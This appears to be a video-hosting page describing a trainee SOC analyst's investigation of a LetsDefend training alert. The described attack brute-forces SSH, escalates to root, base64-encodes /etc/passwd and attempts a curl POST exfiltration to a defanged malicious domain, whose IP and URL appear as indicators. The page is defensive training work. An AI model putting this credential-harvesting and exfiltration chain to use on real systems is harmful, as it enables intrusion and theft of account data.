- Популярные видео
- Авто
- Видео-блоги
- ДТП, аварии
- Для маленьких
- Еда, напитки
- Животные
- Закон и право
- Знаменитости
- Игры
- Искусство
- Комедии
- Красота, мода
- Кулинария, рецепты
- Люди
- Мото
- Музыка
- Мультфильмы
- Наука, технологии
- Новости
- Образование
- Политика
- Праздники
- Приколы
- Природа
- Происшествия
- Путешествия
- Развлечения
- Ржач
- Семья
- Сериалы
- Спорт
- Стиль жизни
- ТВ передачи
- Танцы
- Технологии
- Товары
- Ужасы
- Фильмы
- Шоу-бизнес
- Юмор
Suspicious Base64 Commands SSH Brute Force, Root Escalation & /etc/passwd Exfil | LetsDefend SOC302
Day 115 of Becoming a SOC Analyst — SOC302 Suspicious Base64 Encoding/Decoding Commands Detected (True Positive)
Attacker from 89.187.185.184 brute-forced SSH on Linux host Clark (172.16.20.43), successfully authenticating as analyst before escalating to root via sudo su. The attacker ran getent passwd for user recon, base64-encoded /etc/passwd to /root/Documents/encoded.dat to obfuscate the staged data, then attempted exfiltration via curl POST to hxxp://ukr-net-files-loading-application.ru/upload. No outbound firewall confirmation of successful transfer, but staged file contents confirmed as /etc/passwd — credential harvesting attempt, endpoint contained.
🔬 Analysis Reports
🔍 AbuseIPDB (89.187.185.184) → https://www.abuseipdb.com/check/89.187.185.184?page=5
🦠 VirusTotal (exfil URL) → https://www.virustotal.com/gui/url/c78d42195e5a114d333d70812fc29d36425921fbb27d794b20327fb9fcfff08b/details
Scenario sourced from LetsDefend.io — one of the best hands-on SOC analyst training platforms out there.
Highly recommend if you're on the same path. I'm documenting every day of my journey to landing a Level 1 SOC Analyst role — the wins, the grinds, and everything in between.
00:00 Day 115 intro
00:25 Alert Details
01:27 Investigation
13:10 Playbook Answers
21:00 5w Log
24:45 Result
🔵 What I Cover
Threat Detection · Alert Triage · SIEM Analysis · Log Analysis · Incident Response · Blue Team Tools
🚨 Open to Work — Seeking a Level 1 SOC Analyst role in Melbourne or Remote (AU)
📂 Portfolio → inksec.io
💼 LinkedIn → linkedin.com/in/tate-pannam-8b64b23a3
If you chose the red pill... 0x74617465.sh
#SOCAnalyst #BlueTeam #Cybersecurity #Base64 #SSHBruteForce #PrivilegeEscalation #DataExfiltration #Linux #IncidentResponse #SIEM #Day115 #CyberSecurityJourney #Melbourne #LetsDefend #LetsDefendSOC #ThreatHunting #InfoSec #BlueTeamSecurity
Видео Suspicious Base64 Commands SSH Brute Force, Root Escalation & /etc/passwd Exfil | LetsDefend SOC302 канала InkSec
Attacker from 89.187.185.184 brute-forced SSH on Linux host Clark (172.16.20.43), successfully authenticating as analyst before escalating to root via sudo su. The attacker ran getent passwd for user recon, base64-encoded /etc/passwd to /root/Documents/encoded.dat to obfuscate the staged data, then attempted exfiltration via curl POST to hxxp://ukr-net-files-loading-application.ru/upload. No outbound firewall confirmation of successful transfer, but staged file contents confirmed as /etc/passwd — credential harvesting attempt, endpoint contained.
🔬 Analysis Reports
🔍 AbuseIPDB (89.187.185.184) → https://www.abuseipdb.com/check/89.187.185.184?page=5
🦠 VirusTotal (exfil URL) → https://www.virustotal.com/gui/url/c78d42195e5a114d333d70812fc29d36425921fbb27d794b20327fb9fcfff08b/details
Scenario sourced from LetsDefend.io — one of the best hands-on SOC analyst training platforms out there.
Highly recommend if you're on the same path. I'm documenting every day of my journey to landing a Level 1 SOC Analyst role — the wins, the grinds, and everything in between.
00:00 Day 115 intro
00:25 Alert Details
01:27 Investigation
13:10 Playbook Answers
21:00 5w Log
24:45 Result
🔵 What I Cover
Threat Detection · Alert Triage · SIEM Analysis · Log Analysis · Incident Response · Blue Team Tools
🚨 Open to Work — Seeking a Level 1 SOC Analyst role in Melbourne or Remote (AU)
📂 Portfolio → inksec.io
💼 LinkedIn → linkedin.com/in/tate-pannam-8b64b23a3
If you chose the red pill... 0x74617465.sh
#SOCAnalyst #BlueTeam #Cybersecurity #Base64 #SSHBruteForce #PrivilegeEscalation #DataExfiltration #Linux #IncidentResponse #SIEM #Day115 #CyberSecurityJourney #Melbourne #LetsDefend #LetsDefendSOC #ThreatHunting #InfoSec #BlueTeamSecurity
Видео Suspicious Base64 Commands SSH Brute Force, Root Escalation & /etc/passwd Exfil | LetsDefend SOC302 канала InkSec
Комментарии отсутствуют
Информация о видео
7 мая 2026 г. 3:45:00
00:27:36
Другие видео канала
sudo CVE-2025-32463 — chroot Privilege Escalation Confirmed on Linux Host | LetsDefend Alert SOC341
Wscript.exe LOLBin Executes VBS Dropper — C2 Comms on Non-Standard Port | LetsDefend Alert Triage
QBot Malware Memory Forensics — Tracing a Banking Trojan from Excel Macro to C2 | CyberDefenders Lab
Day 45 of Becoming a SOC Analyst | MSHTA Abused to Download Remote Payload — LOLBin Staging Attack
Obfuscated PowerShell Downloads Remote Script In-Memory — Fileless Malware | LetsDefend SOC102
SOC257 Investigation | VPN Login from Unauthorized Country (True Positive) | LetsDefend SOC
SQL Injection Attack Detected (Exploit Public-Facing App) | LetsDefend SOC Investigation
SOC Malware Analysis – Malicious DOC Dropper Investigation (LetsDefend Malware Challenge)
SOC Web Attack Challenge – Deep Log Analysis Walkthrough (LetsDefend)
LetsDefend ANY.RUN Question – Which File Is Malicious? (Sandbox Analysis Explained)
Phishing Reset Link Leads to Credential Theft | Let’s Defend SOC275 Investigation
SOC176 RDP Brute Force Detected (EventID 234) | Confirmed Compromise | LetsDefend SOC
CRITICAL Lumma Stealer Infection | ClickFix Phishing → DLL Side-Loading (SOC338 LetsDefend)
TryHackMe Night Shift Task 8 Walkthrough SOC Analyst Ransomware and Cloud Investigation
SQL Injection Alert on Authorized Pentest Activity — False Positive Triage | LetsDefend Alert Triage
Windows Defender Evasion — Brute Force Entry, Rundll32 LOLBin PoC | LetsDefend SOC321
SOC Investigation – Malicious Attachment Detected (Phishing Alert) (LetsDefend SOC114)
SOC101 Phishing Mail Detected — Emotet Macro Dropper via Fake UPS Notification | LetsDefend Alert
CRITICAL PAN-OS Exploited | CVE-2024-3400 Command Injection (LetsDefend SOC274)
Phishing Email — Emotet Attachment Blocked, C2 Infrastructure Identified | LetsDefend Alert Triage
Cryptojacking Alert on a bit.ly Shortened URL — Rickrolled by a False Positive | LetsDefend Alert
